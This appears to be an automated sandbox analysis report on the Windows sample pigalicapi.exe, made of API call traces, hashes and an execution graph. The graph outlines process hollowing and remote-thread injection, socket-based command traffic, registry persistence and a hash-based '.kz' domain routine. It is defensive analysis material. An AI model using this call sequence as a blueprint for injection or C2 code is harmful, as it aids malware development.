                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 313313983-0
                                                                                                                                                                                • Opcode ID: 0940e95bdd151ac375cd054cee82d83fd6724329ebe5cdef56043b15602cc1f8
                                                                                                                                                                                • Instruction ID: 43b8af68bf55e442792f93026a552ae427050b45aa5eee8aa87d043aa8083ccb
                                                                                                                                                                                • Opcode Fuzzy Hash: 0940e95bdd151ac375cd054cee82d83fd6724329ebe5cdef56043b15602cc1f8
                                                                                                                                                                                • Instruction Fuzzy Hash: FB31A0B2A2020B9FDF26DF68DC84DBE7BA5EB50610F054368ED04D7191EB35D960CB90
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • wsprintfA.USER32 ref: 005D7429
                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,000F003F,00000000), ref: 005D7465
                                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 005D7473
                                                                                                                                                                                • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 005D748B
                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 005D7495
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseLocalOpenTimeValuewsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3926099652-0
                                                                                                                                                                                • Opcode ID: 8dc7633a533109b5d3f18f2ded017080b3c3e19e9c42a21a23fc7a70e2d608be
                                                                                                                                                                                • Instruction ID: a5caf534d4fc5413c370bf82f1085313622f276a95c45de192382c4be6bb7114
                                                                                                                                                                                • Opcode Fuzzy Hash: 8dc7633a533109b5d3f18f2ded017080b3c3e19e9c42a21a23fc7a70e2d608be
                                                                                                                                                                                • Instruction Fuzzy Hash: B8212C75904209EBDF24DF98DC89FEE7B78BB48700F04855EF9019A281E7B49644DB51
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 005D9690
                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,00000000), ref: 005D96DF
                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 005D96E9
                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 005D9701
                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 005D9719
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrlen$lstrcat
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 493641738-0
                                                                                                                                                                                • Opcode ID: 557f4a9b4644a6e76b3165c4c7e948e746f8d19dfb9bc8b74a478610b003380e
                                                                                                                                                                                • Instruction ID: a71b7c9873b24ba743c99824cb50859a47f18b37f3a75276e60801629f6e8343
                                                                                                                                                                                • Opcode Fuzzy Hash: 557f4a9b4644a6e76b3165c4c7e948e746f8d19dfb9bc8b74a478610b003380e
                                                                                                                                                                                • Instruction Fuzzy Hash: B521277090124AEFCB24CFA8D888BAE7FB5FF44304F14854AE915A7340D374EA58CB91
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32(0120955C,?,?,01209521,0120908D), ref: 01209CFF
                                                                                                                                                                                • _free.LIBCMT ref: 01209D34
                                                                                                                                                                                • _free.LIBCMT ref: 01209D5B
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,01209521,0120908D), ref: 01209D68
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,01209521,0120908D), ref: 01209D71
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                                                • Opcode ID: 407322aea7741e66e7acdaecea78c758f9c6ae0aae8efa1557fa2ebad3460a77
                                                                                                                                                                                • Instruction ID: 69b4140394340b2867cebd512b04fcfb7e4e900122e341183acec017d20488d8
                                                                                                                                                                                • Opcode Fuzzy Hash: 407322aea7741e66e7acdaecea78c758f9c6ae0aae8efa1557fa2ebad3460a77
                                                                                                                                                                                • Instruction Fuzzy Hash: 2C0186365B0B12679B23B2387C88A6F2639ABE15697140314FA1B931C7EE7584C18261
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • _free.LIBCMT ref: 0120C366
                                                                                                                                                                                  • Part of subcall function 0120A64E: HeapFree.KERNEL32(00000000,00000000,?,0120C3E5,01209521,00000000,01209521,00000000,?,0120C40C,01209521,00000007,01209521,?,0120AD38,01209521), ref: 0120A664
                                                                                                                                                                                  • Part of subcall function 0120A64E: GetLastError.KERNEL32(01209521,?,0120C3E5,01209521,00000000,01209521,00000000,?,0120C40C,01209521,00000007,01209521,?,0120AD38,01209521,01209521), ref: 0120A676
                                                                                                                                                                                • _free.LIBCMT ref: 0120C378
                                                                                                                                                                                • _free.LIBCMT ref: 0120C38A
                                                                                                                                                                                • _free.LIBCMT ref: 0120C39C
                                                                                                                                                                                • _free.LIBCMT ref: 0120C3AE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                • Opcode ID: db39022205717dd64db2099b5697330825204066c4dcf5c622788caf44d280eb
                                                                                                                                                                                • Instruction ID: fd7bb0fd36047c78eed4fbb6d2c51de2c40f4ab4da1e50180f6523f11ab39c4e
                                                                                                                                                                                • Opcode Fuzzy Hash: db39022205717dd64db2099b5697330825204066c4dcf5c622788caf44d280eb
                                                                                                                                                                                • Instruction Fuzzy Hash: 12F0C272530302AFDB36EB68F985C6A77F9BA403103940B45F608C3186CB31F8E08768
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • _free.LIBCMT ref: 0120F42E
                                                                                                                                                                                  • Part of subcall function 0120A64E: HeapFree.KERNEL32(00000000,00000000,?,0120C3E5,01209521,00000000,01209521,00000000,?,0120C40C,01209521,00000007,01209521,?,0120AD38,01209521), ref: 0120A664
                                                                                                                                                                                  • Part of subcall function 0120A64E: GetLastError.KERNEL32(01209521,?,0120C3E5,01209521,00000000,01209521,00000000,?,0120C40C,01209521,00000007,01209521,?,0120AD38,01209521,01209521), ref: 0120A676
                                                                                                                                                                                • _free.LIBCMT ref: 0120F440
                                                                                                                                                                                • _free.LIBCMT ref: 0120F453
                                                                                                                                                                                • _free.LIBCMT ref: 0120F464
                                                                                                                                                                                • _free.LIBCMT ref: 0120F475
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                • Opcode ID: 7bc817817d469d0e90750ccd21d716651b160b8fa54d91ef5c8a60b7123651e3
                                                                                                                                                                                • Instruction ID: 8fe2241f997e039027ef96364fdff24bec20c50ed2470ab64b259f7d5bef65b5
                                                                                                                                                                                • Opcode Fuzzy Hash: 7bc817817d469d0e90750ccd21d716651b160b8fa54d91ef5c8a60b7123651e3
                                                                                                                                                                                • Instruction Fuzzy Hash: 10F01DBD861626CB8B276F24BD084983BB1FB146103410206FA515329DDB6525A28B89
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\pigalicapi.exe,00000104), ref: 0120EE14
                                                                                                                                                                                • _free.LIBCMT ref: 0120EEDF
                                                                                                                                                                                • _free.LIBCMT ref: 0120EEE9
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$FileModuleName
                                                                                                                                                                                • String ID: C:\Users\user\pigalicapi.exe
                                                                                                                                                                                • API String ID: 2506810119-1864792673
                                                                                                                                                                                • Opcode ID: fea2401bebd5041c78b4fc707129930791b006f7f427734b1db85ee4a1b3bd74
                                                                                                                                                                                • Instruction ID: e4a451b1a1199511453e736c70e3741977b4ee5325931ceb3fc08ab48976a9ab
                                                                                                                                                                                • Opcode Fuzzy Hash: fea2401bebd5041c78b4fc707129930791b006f7f427734b1db85ee4a1b3bd74
                                                                                                                                                                                • Instruction Fuzzy Hash: 9E31C572A5021DAFDB33DF99D884CAEBFFCEB94320B114566E90497286D6B05E80CB50
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 005D9308
                                                                                                                                                                                  • Part of subcall function 005D8BB0: CryptAcquireContextA.ADVAPI32(00000000,005DC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 005D8BFF
                                                                                                                                                                                  • Part of subcall function 005D8BB0: GetLastError.KERNEL32 ref: 005D8C09
                                                                                                                                                                                  • Part of subcall function 005D8BB0: CryptAcquireContextA.ADVAPI32(00000000,005DC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 005D8C38
                                                                                                                                                                                  • Part of subcall function 005D8BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 005D8C59
                                                                                                                                                                                  • Part of subcall function 005D8BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 005D8C71
                                                                                                                                                                                  • Part of subcall function 005D8BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 005D8C99
                                                                                                                                                                                  • Part of subcall function 005D8BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 005D8CC1
                                                                                                                                                                                  • Part of subcall function 005D8BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 005D8CD5
                                                                                                                                                                                  • Part of subcall function 005D8BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 005D8CE1
                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,.kz), ref: 005D93DB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastLocalReleaseTimelstrcat
                                                                                                                                                                                • String ID: .kz$D]
                                                                                                                                                                                • API String ID: 2740484991-1447230974
                                                                                                                                                                                • Opcode ID: 7f97c68032519d194302682407301a2e193fd31637c2a14d1a470b6e0b67d181
                                                                                                                                                                                • Instruction ID: ff80b27f8afe799511e6370178590ffdfccee1e3924035e3f1a87296820df064
                                                                                                                                                                                • Opcode Fuzzy Hash: 7f97c68032519d194302682407301a2e193fd31637c2a14d1a470b6e0b67d181
                                                                                                                                                                                • Instruction Fuzzy Hash: 80310CB1D00209EBCF14DF98C885BEEBBB5FF98304F10855BE515A7381E638AA85DB51
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0120A6CB,00000000,00000000,00000000,00000000,?,0120A8C8,00000006,FlsSetValue), ref: 0120A756
                                                                                                                                                                                • GetLastError.KERNEL32(?,0120A6CB,00000000,00000000,00000000,00000000,?,0120A8C8,00000006,FlsSetValue,0122DEB8,FlsSetValue,00000000,00000364,?,01209D48), ref: 0120A762
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0120A6CB,00000000,00000000,00000000,00000000,?,0120A8C8,00000006,FlsSetValue,0122DEB8,FlsSetValue,00000000), ref: 0120A770
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3177248105-0
                                                                                                                                                                                • Opcode ID: 7d15ac4d678a5eb06f0f8ef68af462eb4598d78c3fe2b812b892cd065c735606
                                                                                                                                                                                • Instruction ID: 3d5edb7a43860bcb7acf05b980b5a654fae1bf27ccf3f09015c61e388279761e
                                                                                                                                                                                • Opcode Fuzzy Hash: 7d15ac4d678a5eb06f0f8ef68af462eb4598d78c3fe2b812b892cd065c735606
                                                                                                                                                                                • Instruction Fuzzy Hash: 3A01D8326613279BC7378A7CAC48A6E7BB8BB156A17514720FA0BD71C2DB60D40087D0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 0120E754
                                                                                                                                                                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0120E759
                                                                                                                                                                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 0120E75E
                                                                                                                                                                                  • Part of subcall function 0120E968: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0120E979
                                                                                                                                                                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 0120E773
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1761009282-0
                                                                                                                                                                                • Opcode ID: c159cde3fdb6edac0943f80b033b7cce3f46555bf4def25ce9c02c725699af90
                                                                                                                                                                                • Instruction ID: 30e9ca9fb04c51c5f03b0ee7a5bbaf36d2780e9c7d41bce75c9f02bdaf8b67d1
                                                                                                                                                                                • Opcode Fuzzy Hash: c159cde3fdb6edac0943f80b033b7cce3f46555bf4def25ce9c02c725699af90
                                                                                                                                                                                • Instruction Fuzzy Hash: CDC04C55035247546FAB3A7513415BD03001C729CDB831FC2C991275D3D94600CA5573
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: inet_ntoawnsprintf
                                                                                                                                                                                • String ID: %s:%u
                                                                                                                                                                                • API String ID: 890441721-1474915593
                                                                                                                                                                                • Opcode ID: c0d99a8f4808c1aee0b603ec838523a56ff8d8a0bb28f0536c3dc433a1a9c70e
                                                                                                                                                                                • Instruction ID: 2f12709861530a2b153c57d0862a361c60c5041fd5d285dc252c24065f919e52
                                                                                                                                                                                • Opcode Fuzzy Hash: c0d99a8f4808c1aee0b603ec838523a56ff8d8a0bb28f0536c3dc433a1a9c70e
                                                                                                                                                                                • Instruction Fuzzy Hash: 17118E7290820DEBDB24CF98C9A5BADBFB4FB54304F00858FE915AA381E335E645CB51
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 005D1EB4
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 005D1EC2
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                                                                • String ID: D
                                                                                                                                                                                • API String ID: 3712363035-2746444292
                                                                                                                                                                                • Opcode ID: 09507e9cb33da1f4b436b8ffc21edde123fb94be649b75b8b2e3db95cd1bd81d
                                                                                                                                                                                • Instruction ID: 08080e63e9b9dea2e3c9978c7ac6048e7fd53794942a0e8fd618b86a5e8192f0
                                                                                                                                                                                • Opcode Fuzzy Hash: 09507e9cb33da1f4b436b8ffc21edde123fb94be649b75b8b2e3db95cd1bd81d
                                                                                                                                                                                • Instruction Fuzzy Hash: 01016275A4020DBBDB20DB94CD49FEE7BB9BB44700F04411AFA08AB280E7709A44C7A1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:2.1%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:98.7%
                                                                                                                                                                                Signature Coverage:0.7%
                                                                                                                                                                                Total number of Nodes:1143
                                                                                                                                                                                Total number of Limit Nodes:15
                                                                                                                                                                                execution_graph 17531 401000 17533 401005 17531->17533 17534 401014 LoadLibraryExA 17533->17534 17536 401056 GetProcAddress 17534->17536 17539 401126 VirtualAlloc 17536->17539 17540 40114e 17539->17540 17541 401083 GetPEB 17540->17541 17546 4011cd 17540->17546 17543 4011b4 17550 4001989 17543->17550 17569 4001780 WSAStartup 17543->17569 17547 40124a 17546->17547 17549 4011e6 17546->17549 17547->17543 17548 4011f1 LoadLibraryExA 17548->17547 17548->17549 17549->17547 17549->17548 17551 40017b6 17550->17551 17553 400198b Sleep 17551->17553 17554 40017de CreateEventA 17551->17554 17589 4001490 17551->17589 17553->17551 17606 40023e0 17554->17606 17559 400196e WaitForSingleObject Sleep 17560 400199b WSACleanup 17559->17560 17564 40019a0 ExitProcess 17560->17564 17562 40023e0 32 API calls 17566 4001891 17562->17566 17563 4001831 CreateThread 17563->17566 17669 4001630 17563->17669 17565 4001dc0 8 API calls 17565->17566 17566->17559 17566->17562 17566->17565 17621 4001470 GetProcessHeap RtlAllocateHeap 17566->17621 17568 4001903 CreateThread 17568->17566 17683 4001630 48 API calls 17568->17683 17570 40019a0 ExitProcess 17569->17570 17572 40017a2 17569->17572 17571 4001490 18 API calls 17571->17572 17572->17571 17573 400198b Sleep 17572->17573 17574 40017de CreateEventA 17572->17574 17575 4001996 17573->17575 17576 40023e0 32 API calls 17574->17576 17575->17572 17577 4001804 17576->17577 17578 4001dc0 8 API calls 17577->17578 17586 4001891 17577->17586 17579 4001827 17578->17579 17684 4001470 GetProcessHeap RtlAllocateHeap 17579->17684 17580 400196e WaitForSingleObject Sleep 17581 400199b WSACleanup 17580->17581 17581->17570 17583 40023e0 32 API calls 17583->17586 17584 4001831 CreateThread 17584->17586 17687 4001630 48 API calls 17584->17687 17585 4001dc0 8 API calls 17585->17586 17586->17580 17586->17583 17586->17585 17685 4001470 GetProcessHeap RtlAllocateHeap 17586->17685 17588 4001903 CreateThread 17588->17586 17686 4001630 48 API calls 17588->17686 17591 40014c2 17589->17591 17590 400161a 17590->17551 17591->17590 17622 4001430 17591->17622 17594 4001430 QueryPerformanceCounter 17595 4001524 17594->17595 17625 4001160 socket 17595->17625 17598 400160d Sleep 17598->17590 17599 400155f 17634 40013b0 17599->17634 17648 4001f80 17606->17648 17609 4001dc0 17610 4001827 17609->17610 17611 4001dd7 17609->17611 17620 4001470 GetProcessHeap RtlAllocateHeap 17610->17620 17611->17610 17612 4001de1 VirtualAlloc 17611->17612 17612->17610 17613 4001e2a VirtualAllocEx 17612->17613 17614 4001e4f VirtualAllocEx 17613->17614 17616 4001e87 17613->17616 17615 4001e6f VirtualFree 17614->17615 17614->17616 17615->17610 17617 4001f03 WriteProcessMemory 17616->17617 17618 4001f22 VirtualFree 17617->17618 17619 4001f37 VirtualFree CreateRemoteThread 17617->17619 17618->17610 17619->17610 17620->17563 17621->17568 17623 4001440 QueryPerformanceCounter 17622->17623 17624 400143c 17622->17624 17623->17624 17624->17594 17626 4001182 htons gethostbyname 17625->17626 17627 400117a 17625->17627 17626->17627 17628 40011ab 17626->17628 17627->17598 17627->17599 17629 40011fa 17628->17629 17630 40011e7 connect 17628->17630 17631 4001218 17629->17631 17632 400120a closesocket 17629->17632 17630->17628 17630->17629 17631->17627 17633 400121e setsockopt setsockopt 17631->17633 17632->17627 17633->17627 17635 4001411 lstrcat GetTickCount 17634->17635 17637 40013c3 17634->17637 17638 40010e0 17635->17638 17636 40013e3 QueryPerformanceCounter Sleep 17636->17637 17637->17635 17637->17636 17639 40010ec 17638->17639 17640 40010f2 17638->17640 17639->17640 17641 4001103 send 17639->17641 17642 400113a send 17639->17642 17643 4001040 17640->17643 17641->17639 17641->17640 17642->17640 17645 4001052 closesocket 17643->17645 17647 400104c 17643->17647 17644 4001067 recv 17644->17647 17645->17590 17646 4001094 GetTickCount 17646->17647 17647->17644 17647->17645 17647->17646 17649 4001f93 GetEnvironmentVariableA lstrcat 17648->17649 17653 4001804 17648->17653 17650 4001fc2 lstrcat lstrcat 17649->17650 17651 4001fe5 17649->17651 17650->17651 17652 4002008 VirtualAlloc 17651->17652 17652->17653 17654 400206d CreateProcessA 17652->17654 17653->17566 17653->17609 17655 40020b2 VirtualAllocEx 17654->17655 17656 400209a VirtualFree 17654->17656 17657 40020e3 VirtualAllocEx 17655->17657 17660 400214d 17655->17660 17656->17653 17658 400210c TerminateProcess CloseHandle CloseHandle VirtualFree 17657->17658 17657->17660 17658->17653 17659 400224b WriteProcessMemory 17661 4002270 TerminateProcess CloseHandle CloseHandle VirtualFree 17659->17661 17662 40022b1 VirtualFree GetThreadContext 17659->17662 17660->17659 17661->17653 17663 4002314 WriteProcessMemory 17662->17663 17664 40022e4 TerminateProcess CloseHandle CloseHandle 17662->17664 17665 4002367 SetThreadContext 17663->17665 17666 400233a TerminateProcess CloseHandle CloseHandle 17663->17666 17664->17653 17667 4002394 ResumeThread 17665->17667 17668 40023a9 TerminateProcess CloseHandle CloseHandle 17665->17668 17666->17653 17667->17653 17668->17653 17670 4001640 CoInitialize 17669->17670 17671 4001766 17669->17671 17670->17671 17675 4001668 17670->17675 17672 400167c WaitForSingleObject 17673 40016a3 GetExitCodeProcess 17672->17673 17674 400168f TerminateProcess 17672->17674 17673->17675 17674->17671 17675->17671 17675->17672 17676 40016cc Sleep 17675->17676 17677 40016e5 SetEvent 17675->17677 17678 40016f6 CloseHandle Sleep 17675->17678 17676->17675 17677->17671 17679 40023e0 32 API calls 17678->17679 17682 4001723 17679->17682 17680 4001735 17680->17671 17681 4001dc0 8 API calls 17681->17682 17682->17675 